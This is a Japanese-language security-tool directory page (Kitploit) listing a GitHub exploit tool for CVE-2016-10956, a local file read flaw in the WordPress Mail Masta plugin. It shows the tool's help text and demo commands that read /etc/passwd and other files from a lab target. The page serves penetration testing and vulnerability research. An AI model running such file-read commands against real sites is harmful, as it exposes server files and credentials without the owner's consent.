Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2016-10956-mail-masta — MailMasta wordpressプラグインのローカルファイルインクルード脆弱性(CVE-2016-10956) | Kitploit
ツール/GitHubGitHub/p0dalirius/cve-2016-10956-mail-masta
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubp0dalirius/cve-2016-10956-mail-masta

CVE-2016-10956-mail-masta

MailMasta wordpressプラグインのローカルファイルインクルード脆弱性(CVE-2016-10956)

リポジトリを見るウェブサイト
21214年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Mail Masta - ローカルファイル読み取り (CVE-2016-10956)

GitHub release (latest by date) YouTube Channel Subscribers

WordPress 用 mail-masta プラグイン 1.0 には、count_of_send.php と csvexport.php にローカルファイル読み取りの脆弱性があります。

使い方

root@kitploit:~
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

デモ

特定のリモートファイルを読み取る

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

ワードリストから特定のリモートファイルを読み取る

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

ワードリストから特定のリモートファイルを読み取り、見つかったファイルのみを表示する

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success

参考情報

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10956
  • https://cxsecurity.com/issue/WLB-2016080220
  • https://wordpress.org/plugins/mail-masta/#developers
  • https://wpvulndb.com/vulnerabilities/8609
ツールをダウンロード